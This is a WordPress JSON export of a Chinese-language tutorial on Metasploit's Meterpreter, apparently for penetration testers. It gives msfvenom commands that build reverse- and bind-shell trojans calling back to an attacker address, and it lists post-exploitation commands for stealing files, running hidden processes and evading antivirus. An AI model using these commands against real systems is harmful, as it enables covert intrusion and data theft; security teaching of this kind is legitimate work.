{"id":305,"date":"2022-06-12T15:05:01","date_gmt":"2022-06-12T07:05:01","guid":{"rendered":"https:\/\/sportrehabilitation.cn\/?p=305"},"modified":"2022-06-12T15:05:05","modified_gmt":"2022-06-12T07:05:05","slug":"meterpreter%e5%91%bd%e4%bb%a4%e8%af%a6%e8%a7%a3","status":"publish","type":"post","link":"https:\/\/sportai.asia\/index.php\/2022\/06\/12\/meterpreter%e5%91%bd%e4%bb%a4%e8%af%a6%e8%a7%a3\/","title":{"rendered":"Meterpreter\u547d\u4ee4\u8be6\u89e3<\/a>"},"content":{"rendered":"\n

0x01\u521d\u8bc6Meterpreter<\/h2>\n\n\n\n

1.1.\u4ec0\u4e48\u662fMeterpreter<\/p>\n\n\n\n

  Meterpreter\u662fMetasploit\u6846\u67b6\u4e2d\u7684\u4e00\u4e2a\u6269\u5c55\u6a21\u5757\uff0c\u4f5c\u4e3a\u6ea2\u51fa\u6210\u529f\u4ee5\u540e\u7684\u653b\u51fb\u8f7d\u8377\u4f7f\u7528\uff0c\u653b\u51fb\u8f7d\u8377\u5728\u6ea2\u51fa\u653b\u51fb\u6210\u529f\u4ee5\u540e\u7ed9\u6211\u4eec\u8fd4\u56de\u4e00\u4e2a\u63a7\u5236\u901a\u9053\u3002\u4f7f\u7528\u5b83\u4f5c\u4e3a\u653b\u51fb\u8f7d\u8377\u80fd\u591f\u83b7\u5f97\u76ee\u6807\u7cfb\u7edf\u7684\u4e00\u4e2aMeterpreter shell\u7684\u94fe\u63a5\u3002Meterpreter shell\u4f5c\u4e3a\u6e17\u900f\u6a21\u5757\u6709\u5f88\u591a\u6709\u7528\u7684\u529f\u80fd\uff0c\u6bd4\u5982\u6dfb\u52a0\u4e00\u4e2a\u7528\u6237\u3001\u9690\u85cf\u4e00\u4e9b\u4e1c\u897f\u3001\u6253\u5f00shell\u3001\u5f97\u5230\u7528\u6237\u5bc6\u7801\u3001\u4e0a\u4f20\u4e0b\u8f7d\u8fdc\u7a0b\u4e3b\u673a\u7684\u6587\u4ef6\u3001\u8fd0\u884ccmd.exe\u3001\u6355\u6349\u5c4f\u5e55\u3001\u5f97\u5230\u8fdc\u7a0b\u63a7\u5236\u6743\u3001\u6355\u83b7\u6309\u952e\u4fe1\u606f\u3001\u6e05\u9664\u5e94\u7528\u7a0b\u5e8f\u3001\u663e\u793a\u8fdc\u7a0b\u4e3b\u673a\u7684\u7cfb\u7edf\u4fe1\u606f\u3001\u663e\u793a\u8fdc\u7a0b\u673a\u5668\u7684\u7f51\u7edc\u63a5\u53e3\u548cIP\u5730\u5740\u7b49\u4fe1\u606f\u3002\u53e6\u5916Meterpreter\u80fd\u591f\u8eb2\u907f\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u3002\u5728\u8fdc\u7a0b\u4e3b\u673a\u4e0a\u9690\u85cf\u81ea\u5df1,\u5b83\u4e0d\u6539\u53d8\u7cfb\u7edf\u786c\u76d8\u4e2d\u7684\u6587\u4ef6,\u56e0\u6b64HIDS[\u57fa\u4e8e\u4e3b\u673a\u7684\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf]\u5f88\u96be\u5bf9\u5b83\u505a\u51fa\u54cd\u5e94\u3002\u6b64\u5916\u5b83\u5728\u8fd0\u884c\u7684\u65f6\u5019\u7cfb\u7edf\u65f6\u95f4\u662f\u53d8\u5316\u7684,\u6240\u4ee5\u8ddf\u8e2a\u5b83\u6216\u8005\u7ec8\u6b62\u5b83\u5bf9\u4e8e\u4e00\u4e2a\u6709\u7ecf\u9a8c\u7684\u4eba\u4e5f\u4f1a\u53d8\u5f97\u975e\u5e38\u56f0\u96be\u3002<\/p>\n\n\n\n

  \u6700\u540e,Meterpreter\u8fd8\u53ef\u4ee5\u7b80\u5316\u4efb\u52a1\u521b\u5efa\u591a\u4e2a\u4f1a\u8bdd\u3002\u53ef\u4ee5\u6765\u5229\u7528\u8fd9\u4e9b\u4f1a\u8bdd\u8fdb\u884c\u6e17\u900f\u3002\u5728Metasploit Framework\u4e2d\uff0cMeterpreter\u662f\u4e00\u79cd\u540e\u6e17\u900f\u5de5\u5177\uff0c\u5b83\u5c5e\u4e8e\u4e00\u79cd\u5728\u8fd0\u884c\u8fc7\u7a0b\u4e2d\u53ef\u901a\u8fc7\u7f51\u7edc\u8fdb\u884c\u529f\u80fd\u6269\u5c55\u7684\u52a8\u6001\u53ef\u6269\u5c55\u578bPayload\u3002\u8fd9\u79cd\u5de5\u5177\u662f\u57fa\u4e8e\u201c\u5185\u5b58DLL\u6ce8\u5165\u201d\u7406\u5ff5\u5b9e\u73b0\u7684\uff0c\u5b83\u80fd\u591f\u901a\u8fc7\u521b\u5efa\u4e00\u4e2a\u65b0\u8fdb\u7a0b\u5e76\u8c03\u7528\u6ce8\u5165\u7684DLL\u6765\u8ba9\u76ee\u6807\u7cfb\u7edf\u8fd0\u884c\u6ce8\u5165\u7684DLL\u6587\u4ef6\u3002\u5176\u4e2d\uff0c\u653b\u51fb\u8005\u4e0e\u76ee\u6807\u8bbe\u5907\u4e2dMeterpreter\u7684\u901a\u4fe1\u662f\u901a\u8fc7Stager\u5957\u63a5\u5b57\u5b9e\u73b0\u7684meterpreter\u4f5c\u4e3a\u540e\u6e17\u900f\u6a21\u5757\u6709\u591a\u79cd\u7c7b\u578b\uff0c\u5e76\u4e14\u547d\u4ee4\u7531\u6838\u5fc3\u547d\u4ee4\u548c\u6269\u5c55\u5e93\u547d\u4ee4\u7ec4\u6210\uff0c\u6781\u5927\u7684\u4e30\u5bcc\u4e86\u653b\u51fb\u65b9\u5f0f\u3002<\/p>\n\n\n\n

 \u9700\u8981\u8bf4\u660e\u7684meterpreter\u5728\u6f0f\u6d1e\u5229\u7528\u6210\u529f\u540e\u4f1a\u53d1\u9001\u7b2c\u4e8c\u9636\u6bb5\u7684\u4ee3\u7801\u548cmeterpreter\u670d\u52a1\u5668dll\uff0c\u6240\u4ee5\u5728\u7f51\u7edc\u4e0d\u7a33\u5b9a\u7684\u60c5\u51b5\u4e0b\u7ecf\u5e38\u51fa\u73b0\u6ca1\u6709\u53ef\u6267\u884c\u547d\u4ee4\uff0c\u6216\u8005\u4f1a\u8bdd\u5efa\u7acb\u6267\u884chelp\u4e4b\u540e\u53d1\u73b0\u7f3a\u5c11\u547d\u4ee4\u3002 \u8fde\u4e0avpn\u53c8\u5728\u5185\u7f51\u4e2d\u4f7f\u7528psexec\u548cbind_tcp\u7684\u65f6\u5019\u7ecf\u5e38\u4f1a\u51fa\u73b0\u8fd9\u79cd\u60c5\u51b5<\/p>\n\n\n\n

1.2.Meterpreter\u6280\u672f\u4f18\u52bf<\/p>\n\n\n\n

  Metasploit\u63d0\u4f9b\u4e86\u5404\u4e2a\u4e3b\u6d41\u5e73\u53f0\u7684Meterpreter\u7248\u672c\uff0c\u5305\u62ecWindows\u3001Linux\uff0c\u540c\u65f6\u652f\u6301x86\u3001x64\u5e73\u53f0\uff0c\u53e6\u5916\uff0cMeterpreter\u8fd8\u63d0\u4f9b\u4e86\u57fa\u4e8ePHP\u548cJava\u8bed\u8a00\u7684\u5b9e\u73b0\u3002Meterpreter\u7684\u5de5\u4f5c\u6a21\u5f0f\u662f\u7eaf\u5185\u5b58\u7684\uff0c\u597d\u5904\u662f\u542f\u52a8\u9690\u85cf\uff0c\u5f88\u96be\u88ab\u6740\u6bd2\u8f6f\u4ef6\u76d1\u6d4b\u5230\u3002\u4e0d\u9700\u8981\u8bbf\u95ee\u76ee\u6807\u4e3b\u673a\u78c1\u76d8\uff0c\u6240\u4ee5\u4e5f\u6ca1\u4ec0\u4e48\u5165\u4fb5\u7684\u75d5\u8ff9\u3002\u9664\u4e0a\u8ff0\u5916\uff0cMeterpreter\u8fd8\u652f\u6301Ruby\u811a\u672c\u5f62\u5f0f\u7684\u6269\u5c55\u3002\u6240\u4ee5Ruby\u8bed\u8a00\u8fd8\u5f88\u6709\u5fc5\u8981\u3002<\/p>\n\n\n\n

0x02 Meterpreter\u4e2d\u5e38\u7528\u7684\u53cd\u5f39\u7c7b\u578b<\/h2>\n\n\n\n

1.reverse_tcp<\/p>\n\n\n\n

\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8eTCP\u7684\u53cd\u5411\u94fe\u63a5\u53cd\u5f39shell, \u4f7f\u7528\u8d77\u6765\u5f88\u7a33\u5b9a<\/p>\n\n\n\n

\uff081\uff09Linux\uff1a<\/p>\n\n\n\n

\u4f7f\u7528\u4e0b\u5217\u547d\u4ee4\u751f\u6210\u4e00\u4e2aLinux\u4e0b\u53cd\u5f39shell\u6728\u9a6c\uff1a<\/p>\n\n\n\n

msfvenom -p linux\/x86\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444  -f elf -o shell<\/p>\n\n\n\n

\u770b\u4e0a\u56fe\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u89c1\u76ee\u5f55\u4e0b\u5df2\u7ecf\u6210\u529f\u751f\u6210\u6728\u9a6c\u6587\u4ef6isshell\u3002\u7136\u540e\u6211\u4eec\u7ed9\u6587\u4ef6\u52a0\u4e0a\u53ef\u6267\u884c\u6743\u9650\u3002\u7136\u540e\u6211\u4eec\u6253\u5f00Metasploit\uff0c\u4f7f\u7528\u6a21\u5757handler\uff0c\u8bbe\u7f6epayload\uff0c\u6ce8\u610f\uff1a\u8fd9\u91cc\u8bbe\u7f6e\u7684payload\u8981\u548c\u6211\u4eec\u751f\u6210\u6728\u9a6c\u6240\u4f7f\u7528\u7684payload\u4e00\u6837\u3002<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u8bbe\u7f6e\u4e0b\u5730\u5740\u548c\u7aef\u53e3\uff0c\u6211\u4eec\u5c31\u5f00\u59cb\u76d1\u542c\u4e86<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u8fd9\u8fb9\u8fd0\u884c\u4e00\u4e0b\u6211\u4eec\u7684\u53cd\u5f39shell\u6728\u9a6c\uff0c\u53ef\u4ee5\u53d1\u73b0\u6210\u529f\u53cd\u5f39\u56deshell\u4e86<\/p>\n\n\n\n

\uff082\uff09Windows\uff1a<\/p>\n\n\n\n

msfvenom -p windows\/meterpreter\/reverse_tcp lhost=[\u4f60\u7684IP] lport=[\u7aef\u53e3] -f exe -o \u8981\u751f\u6210\u7684\u6587\u4ef6\u540d<\/p>\n\n\n\n

msfvenom -p  windows\/meterpreter\/reverse_tcp lhost=192.168.1.102 lport=4444  -f exe -o  shell.exe<\/p>\n\n\n\n

\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/<\/figure>\n\n\n\n

\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"
\u53cd\u5411\u8fde\u63a5shell,\u4f7f\u7528\u8d77\u6765\u5f88\u7a33\u5b9a\uff0c\u9700\u8981\u8bbe\u7f6eLHOST<\/p>\n\n\n\n

2.reverse_http<\/p>\n\n\n\n

\u57fa\u4e8ehttp\u65b9\u5f0f\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5728\u7f51\u901f\u6162\u7684\u60c5\u51b5\u4e0b\u4e0d\u7a33\u5b9a\u3002<\/p>\n\n\n\n

payload:\/windows\/meterpreter\/reverse_http<\/p>\n\n\n\n

3.reverse_https<\/p>\n\n\n\n

\u57fa\u4e8ehttps\u65b9\u5f0f\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5728\u7f51\u901f\u6162\u7684\u60c5\u51b5\u4e0b\u4e0d\u7a33\u5b9a\uff0c https\u5982\u679c\u53cd\u5f39\u6ca1\u6709\u6536\u5230\u6570\u636e\uff0c\u53ef\u4ee5\u5c06\u76d1\u542c\u7aef\u53e3\u6362\u6210443\u8bd5\u8bd5<\/p>\n\n\n\n

payload:\/windows\/meterpreter\/reverse_https<\/p>\n\n\n\n

4.bind_tcp<\/p>\n\n\n\n

\u8fd9\u662f\u4e00\u4e2a\u57fa\u4e8eTCP\u7684\u6b63\u5411\u8fde\u63a5shell\uff0c\u56e0\u4e3a\u5728\u5185\u7f51\u8de8\u7f51\u6bb5\u65f6\u65e0\u6cd5\u8fde\u63a5\u5230attack\u7684\u673a\u5668\uff0c\u6240\u4ee5\u5728\u5185\u7f51\u4e2d\u7ecf\u5e38\u4f1a\u4f7f\u7528\uff0c\u4e0d\u9700\u8981\u8bbe\u7f6eLHOST\u3002<\/p>\n\n\n\n

\u4f7f\u7528\u4e0b\u5217\u547d\u4ee4\u751f\u6210\u6728\u9a6c\uff1a<\/p>\n\n\n\n

msfvenom -p linux\/x86\/meterpreter\/bind_tcp lport=4444  -f elf -o shell<\/p>\n\n\n\n

\u540c\u6837\u9053\u7406\u52a0\u6743\u9650\u8fd0\u884c\uff0c\u4e0d\u6f14\u793a\u4e86\u3002<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u8fd9\u91cc\u6ce8\u610f\uff0c\u6211\u4eec\u8bbe\u7f6e\u7684IP\u5730\u5740\u548c\u7aef\u53e3\u5c31\u662f\u76ee\u6807\u673a\u7684\u3002\u56e0\u4e3a\u8fd9\u662f\u6211\u4eec\u4e3b\u52a8\u6765\u8fde\u63a5\u5b83\u3002<\/p>\n\n\n\n

0x03 \u76f8\u5173Payload<\/h2>\n\n\n\n

Payload\u4e2d\u5305\u542b\u6709\u9700\u8981\u5728\u8fdc\u7a0b\u7cfb\u7edf\u4e2d\u8fd0\u884c\u7684\u6076\u610f\u4ee3\u7801\uff0c\u800c\u5728Metasploit\u4e2dPayload\u662f\u4e00\u79cd\u7279\u6b8a\u6a21\u5757\uff0c\u5b83\u4eec\u80fd\u591f\u4ee5\u6f0f\u6d1e\u5229\u7528\u6a21\u5757\u8fd0\u884c\uff0c\u5e76\u80fd\u591f\u5229\u7528\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u5b9e\u65bd\u653b\u51fb\u3002\u7b80\u800c\u8a00\u4e4b\uff0c\u8fd9\u79cd\u6f0f\u6d1e\u5229\u7528\u6a21\u5757\u53ef\u4ee5\u8bbf\u95ee\u76ee\u6807\u7cfb\u7edf\uff0c\u800c\u5176\u4e2d\u7684\u4ee3\u7801\u5b9a\u4e49\u4e86Payload\u5728\u76ee\u6807\u7cfb\u7edf\u4e2d\u7684\u884c\u4e3a\u3002<\/p>\n\n\n\n

Metasploit\u4e2d\u7684Payload\u6a21\u5757\u4e3b\u8981\u6709\u4ee5\u4e0b\u4e09\u79cd\u7c7b\u578b\uff1a<\/p>\n\n\n\n

-Single<\/p>\n\n\n\n

-Stager<\/p>\n\n\n\n

-Stage<\/p>\n\n\n\n

Single\u662f\u4e00\u79cd\u5b8c\u5168\u72ec\u7acb\u7684Payload\uff0c\u800c\u4e14\u4f7f\u7528\u8d77\u6765\u5c31\u50cf\u8fd0\u884ccalc.exe\u4e00\u6837\u7b80\u5355\uff0c\u4f8b\u5982\u6dfb\u52a0\u4e00\u4e2a\u7cfb\u7edf\u7528\u6237\u6216\u5220\u9664\u4e00\u4efd\u6587\u4ef6\u3002\u7531\u4e8eSingle Payload\u662f\u5b8c\u5168\u72ec\u7acb\u7684\uff0c\u56e0\u6b64\u5b83\u4eec\u6709\u53ef\u80fd\u4f1a\u88ab\u7c7b\u4f3cnetcat<\/a>\u8fd9\u6837\u7684\u975emetasploit\u5904\u7406\u5de5\u5177\u6240\u6355\u6349\u5230\u3002<\/p>\n\n\n\n

Stager\u8fd9\u79cdPayload\u8d1f\u8d23\u5efa\u7acb\u76ee\u6807\u7528\u6237\u4e0e\u653b\u51fb\u8005\u4e4b\u95f4\u7684\u7f51\u7edc\u8fde\u63a5\uff0c\u5e76\u4e0b\u8f7d\u989d\u5916\u7684\u7ec4\u4ef6\u6216\u5e94\u7528\u7a0b\u5e8f\u3002\u4e00\u79cd\u5e38\u89c1\u7684Stagers Payload\u5c31\u662freverse_tcp\uff0c\u5b83\u53ef\u4ee5\u8ba9\u76ee\u6807\u7cfb\u7edf\u4e0e\u653b\u51fb\u8005\u5efa\u7acb\u4e00\u6761tcp\u8fde\u63a5\u3002\u53e6\u4e00\u79cd\u5e38\u89c1\u7684\u662fbind_tcp\uff0c\u5b83\u53ef\u4ee5\u8ba9\u76ee\u6807\u7cfb\u7edf\u5f00\u542f\u4e00\u4e2atcp\u76d1\u542c\u5668\uff0c\u800c\u653b\u51fb\u8005\u968f\u65f6\u53ef\u4ee5\u4e0e\u76ee\u6807\u7cfb\u7edf\u8fdb\u884c\u901a\u4fe1\u3002<\/p>\n\n\n\n

Stage\u662fStager Payload\u4e0b\u8f7d\u7684\u4e00\u79cdPayload\u7ec4\u4ef6\uff0c\u8fd9\u79cdPayload\u53ef\u4ee5\u63d0\u4f9b\u66f4\u52a0\u9ad8\u7ea7\u7684\u529f\u80fd\uff0c\u800c\u4e14\u6ca1\u6709\u5927\u5c0f\u9650\u5236\u3002<\/p>\n\n\n\n

\u5728Metasploit\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7Payload\u7684\u540d\u79f0\u548c\u4f7f\u7528\u683c\u5f0f\u6765\u63a8\u65ad\u5b83\u7684\u7c7b\u578b\uff1a<\/p>\n\n\n\n

Single Payload\u7684\u683c\u5f0f\u4e3a<target>\/ <single><\/p>\n\n\n\n

Stager\/Stage Payload\u7684\u683c\u5f0f\u4e3a<target>\/ <stage> \/ <stager><\/p>\n\n\n\n

\u5f53\u6211\u4eec\u5728Metasploit\u4e2d\u6267\u884c\u201cshow payloads\u201d\u547d\u4ee4\u4e4b\u540e\uff0c\u5b83\u4f1a\u7ed9\u6211\u4eec\u663e\u793a\u4e00\u4e2a\u53ef\u4f7f\u7528\u7684Payload\u5217\u8868\uff1a<\/p>\n\n\n\n

\"\u624b\u628a\u624b\u6559\u4f60\u5982\u4f55\u5229\u7528Meterpreter\u6e17\u900fWindows\u7cfb\u7edf\"\/<\/a><\/figure>\n\n\n\n

\u5728\u8fd9\u4e2a\u5217\u8868\u4e2d\uff0cwindows\/powershell_bind_tcp\u5c31\u662f\u4e00\u4e2aSingle Payload\uff0c\u5b83\u4e0d\u5305\u542bStage Payload\u3002\u800cwindows\/x64\/meterpreter\/reverse_tcp\u5219\u7531\u4e00\u4e2aStager Payload\uff08reverse_tcp\uff09\u548c\u4e00\u4e2aStage Payload\uff08meterpreter\uff09\u7ec4\u6210\u3002<\/p>\n\n\n\n

0x04 Meterpreter\u7684\u5e38\u7528\u547d\u4ee4<\/h2>\n\n\n\n

1.\u57fa\u672c\u547d\u4ee4<\/p>\n\n\n\n

help# \u67e5\u770bMeterpreter\u5e2e\u52a9<\/p>\n\n\n\n

background#\u8fd4\u56de\uff0c\u628ameterpreter\u540e\u53f0\u6302\u8d77<\/p>\n\n\n\n

bgkill# \u6740\u6b7b\u4e00\u4e2a\u80cc\u666f meterpreter \u811a\u672c<\/p>\n\n\n\n

bglist#\u63d0\u4f9b\u6240\u6709\u6b63\u5728\u8fd0\u884c\u7684\u540e\u53f0\u811a\u672c\u7684\u5217\u8868<\/p>\n\n\n\n

bgrun#\u4f5c\u4e3a\u4e00\u4e2a\u540e\u53f0\u7ebf\u7a0b\u8fd0\u884c\u811a\u672c<\/p>\n\n\n\n

channel#\u663e\u793a\u6d3b\u52a8\u9891\u9053<\/p>\n\n\n\n

sessions -i number # \u4e0e\u4f1a\u8bdd\u8fdb\u884c\u4ea4\u4e92\uff0cnumber\u8868\u793a\u7b2cn\u4e2asession,\u4f7f\u7528session -i \u8fde\u63a5\u5230\u6307\u5b9a\u5e8f\u53f7\u7684meterpreter\u4f1a\u8bdd\u5df2\u7ee7\u7eed\u5229\u7528<\/p>\n\n\n\n

sesssions -k  number #\u4e0e\u4f1a\u8bdd\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n

close# \u5173\u95ed\u901a\u9053<\/p>\n\n\n\n

exit# \u7ec8\u6b62 meterpreter \u4f1a\u8bdd<\/p>\n\n\n\n

quit# \u7ec8\u6b62 meterpreter \u4f1a\u8bdd<\/p>\n\n\n\n

interact id #\u5207\u6362\u8fdb\u4e00\u4e2a\u4fe1\u9053<\/p>\n\n\n\n

run#\u6267\u884c\u4e00\u4e2a\u5df2\u6709\u7684\u6a21\u5757\uff0c\u8fd9\u91cc\u8981\u8bf4\u7684\u662f\u8f93\u5165run\u540e\u6309\u4e24\u4e0btab\uff0c\u4f1a\u5217\u51fa\u6240\u6709\u7684\u5df2\u6709\u7684\u811a\u672c\uff0c\u5e38\u7528\u7684\u6709autoroute,hashdump,arp_scanner,multi_meter_inject\u7b49<\/p>\n\n\n\n

irb# \u8fdb\u5165 Ruby \u811a\u672c\u6a21\u5f0f<\/p>\n\n\n\n

read# \u4ece\u901a\u9053\u8bfb\u53d6\u6570\u636e<\/p>\n\n\n\n

write# \u5c06\u6570\u636e\u5199\u5165\u5230\u4e00\u4e2a\u901a\u9053<\/p>\n\n\n\n

run\u548cbgrun# \u524d\u53f0\u548c\u540e\u53f0\u6267\u884c\u4ee5\u540e\u5b83\u9009\u5b9a\u7684 meterpreter \u811a\u672c<\/p>\n\n\n\n

use# \u52a0\u8f7d meterpreter \u7684\u6269\u5c55<\/p>\n\n\n\n

load\/use#\u52a0\u8f7d\u6a21\u5757<\/p>\n\n\n\n

Resource#\u6267\u884c\u4e00\u4e2a\u5df2\u6709\u7684rc\u811a\u672c<\/p>\n\n\n\n

2.\u6587\u4ef6\u7cfb\u7edf\u547d\u4ee4<\/p>\n\n\n\n

cat c:\\boot.ini#\u67e5\u770b\u6587\u4ef6\u5185\u5bb9,\u6587\u4ef6\u5fc5\u987b\u5b58\u5728<\/p>\n\n\n\n

del c:\\boot.ini #\u5220\u9664\u6307\u5b9a\u7684\u6587\u4ef6<\/p>\n\n\n\n

upload \/root\/Desktop\/netcat.exe c:\\ # \u4e0a\u4f20\u6587\u4ef6\u5230\u76ee\u6807\u673a\u4e3b\u4e0a\uff0c\u5982upload  setup.exe C:\\\\windows\\\\system32\\<\/p>\n\n\n\n

download nimeia.txt \/root\/Desktop\/   # \u4e0b\u8f7d\u6587\u4ef6\u5230\u672c\u673a\u4e0a\u5982\uff1adownload C:\\\\boot.ini \/root\/\u6216\u8005download C:\\\\”ProgramFiles”\\\\Tencent\\\\QQ\\\\Users\\\\295******125\\\\Msg2.0.db \/root\/<\/p>\n\n\n\n

edit c:\\boot.ini  # \u7f16\u8f91\u6587\u4ef6<\/p>\n\n\n\n

getlwd#\u6253\u5370\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n

getwd#\u6253\u5370\u5de5\u4f5c\u76ee\u5f55<\/p>\n\n\n\n

lcd#\u66f4\u6539\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n

ls#\u5217\u51fa\u5728\u5f53\u524d\u76ee\u5f55\u4e2d\u7684\u6587\u4ef6\u5217\u8868<\/p>\n\n\n\n

lpwd#\u6253\u5370\u672c\u5730\u76ee\u5f55<\/p>\n\n\n\n

pwd#\u8f93\u51fa\u5de5\u4f5c\u76ee\u5f55<\/p>\n\n\n\n

cd c:\\\\ #\u8fdb\u5165\u76ee\u5f55\u6587\u4ef6\u4e0b<\/p>\n\n\n\n

rm file #\u5220\u9664\u6587\u4ef6<\/p>\n\n\n\n

mkdir dier #\u5728\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u7684\u521b\u5efa\u76ee\u5f55<\/p>\n\n\n\n

rmdir#\u53d7\u5bb3\u8005\u7cfb\u7edf\u4e0a\u5220\u9664\u76ee\u5f55<\/p>\n\n\n\n

dir#\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u7684\u6587\u4ef6\u548c\u6587\u4ef6\u5939\u4fe1\u606f<\/p>\n\n\n\n

mv#\u4fee\u6539\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u6587\u4ef6\u540d<\/p>\n\n\n\n

search -d d:\\\\www -f web.config #search \u6587\u4ef6\uff0c\u5982search  -d c:\\\\  -f*.doc<\/p>\n\n\n\n

meterpreter > search -f autoexec.bat  #\u641c\u7d22\u6587\u4ef6<\/p>\n\n\n\n

meterpreter > search -f sea*.bat c:\\\\xamp\\\\<\/p>\n\n\n\n

enumdesktops     #\u7528\u6237\u767b\u5f55\u6570<\/p>\n\n\n\n

(1)\u4e0b\u8f7d\u6587\u4ef6<\/p>\n\n\n\n

\u4f7f\u7528\u547d\u4ee4\u201cdownload +file path\u201d,\u5c06\u4e0b\u8f7d\u76ee\u6807\u673a\u5668\u7684\u76f8\u5bf9\u5e94\u6743\u9650\u7684\u4efb\u4f55\u8def\u5f84\u4e0b\u7684\u6587\u4ef6<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(2)\u4e0a\u4f20\u6587\u4ef6<\/p>\n\n\n\n

\u201cupload\u201d\u547d\u4ee4\u4e3a\u4e0a\u4f20\u6587\u4ef6\u5230\u6211\u4eec\u7684\u76ee\u6807\u673a\u5668\uff0c\u5728\u56fe\u4e2d\u6211\u4eec\u4e0a\u4f20\u4e86ll.txt\u5230\u76ee\u6807\u673a\u5668\u7684c:\\pp\\\u4e0b\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(3)\u67e5\u770b\u6587\u4ef6<\/p>\n\n\n\n

\u201ccat filename\u201d\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u67e5\u770b\u6587\u4ef6\u5185\u5bb9\uff0c\u8f93\u5165\u547d\u4ee4\u540e\u4fbf\u4f1a\u8fd4\u56de\u7ed9\u6211\u4eec\u6240\u67e5\u770b\u6587\u4ef6\u7684\u5185\u5bb9\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(4)\u5207\u6362\u3001\u67e5\u8be2\u5f53\u524d\u8def\u5f84<\/p>\n\n\n\n

\u201cpwd\u201d\u547d\u4ee4\u5c06\u67e5\u8be2\u5f53\u524d\u5728dos\u547d\u4ee4\u4e0b\u7684\u8def\u5f84\uff0c\u201ccd\u201d\u547d\u4ee4\u53ef\u4ee5\u6539\u53d8\u5f53\u524d\u8def\u5f84\uff0c\u5982\u4e0b\u56fe\u4e2dcd ..\u4e3a\u5207\u6362\u5230\u5f53\u524d\u8def\u5f84\u4e0b\u7684\u4e0a\u4e00\u76ee\u5f55\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(5)\u201csysinfo\u201d\u547d\u4ee4<\/p>\n\n\n\n

\u201csysinfo\u201d\u547d\u4ee4\u4e3a\u663e\u793a\u8fdc\u7a0b\u4e3b\u673a\u7684\u7cfb\u7edf\u4fe1\u606f\uff0c\u663e\u793a\u8ba1\u7b97\u673a\u3001\u7cfb\u7edf\u4fe1\u606f\u3001\u7ed3\u6784\u3001\u8bed\u8a00\u7b49\u4fe1\u606f\u3002\u53ef\u4ee5\u770b\u5230\u8fdc\u7a0b\u4e3b\u673a\u7684\u64cd\u4f5c\u7cfb\u7edf\u662fwindows XP service pack 2\uff0csp2\u8fd9\u4e2a\u7cfb\u7edf\u6709\u5f88\u591a\u6f0f\u6d1e\u3002<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

(6)execute\u547d\u4ee4<\/p>\n\n\n\n

\u201cexecute\u201d\u547d\u4ee4\u4e3a\u76ee\u6807\u4e3b\u673a\u4e0a\u6267\u884c\u4e00\u4e2a\u547d\u4ee4\uff0c\u5176\u4e2d\u201cexecute -h\u201d\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\u3002-f\u4e3a\u6267\u884c\u8981\u8fd0\u884c\u7684\u547d\u4ee4,<\/p>\n\n\n\n

\"\"\/<\/a><\/figure>\n\n\n\n

\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u8fd0\u884c\u67d0\u4e2a\u7a0b\u5e8f,\u4f8b\u5982\u6211\u4eec\u76ee\u524d\u6ce8\u5165\u8fdb\u7a0b\u5230explorer.exe\u540e\uff0c\u8fd0\u884c\u7528\u6237\u4e3a\u8d85\u7ea7\u7ba1\u7406administrator<\/p>\n\n\n\n

\u6211\u4eec\u8fd0\u884c\u4e00\u4e0b\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u8bb0\u4e8b\u672c\u7a0b\u5e8f<\/p>\n\n\n\n

execute  -f notepad.exe<\/p>\n\n\n\n

\"\"
\u76ee\u6807\u4e3b\u673a\u4e0a\u7acb\u9a6c\u5f39\u51fa\u6765\u4e00\u4e2a\u8bb0\u4e8b\u672c\u7a0b\u5e8f\uff0c\u5982\u4e0b\u56fe\uff1a
\"\"
\u8fd9\u6837\u592a\u660e\u663e\uff0c\u5982\u679c\u5e0c\u671b\u9690\u85cf\u540e\u53f0\u6267\u884c\uff0c\u52a0\u53c2\u6570-H<\/p>\n\n\n\n

execute  -H -f notepad.exe<\/p>\n\n\n\n

\u6b64\u65f6\u76ee\u6807\u4e3b\u673a\u684c\u9762\u6ca1\u53cd\u5e94\uff0c\u4f46\u6211\u4eec\u5728meterpreter\u4f1a\u8bdd\u4e0a\u4f7f\u7528ps\u547d\u4ee4\u770b\u5230\u4e86
\"\"
\u518d\u770b\u4e00\u4e2a\uff0c\u6211\u4eec\u8fd0\u884c\u76ee\u6807\u4e3b\u673a\u4e0a\u7684cmd.exe\u7a0b\u5e8f\uff0c\u5e76\u4ee5\u9690\u85cf\u7684\u65b9\u5f0f\u76f4\u63a5\u4ea4\u4e92\u5230\u6211\u4eec\u7684meterpreter\u4f1a\u8bdd\u4e0a<\/p>\n\n\n\n

\u547d\u4ee4\uff1a<\/p>\n\n\n\n

execute  -H -i -f cmd.exe<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

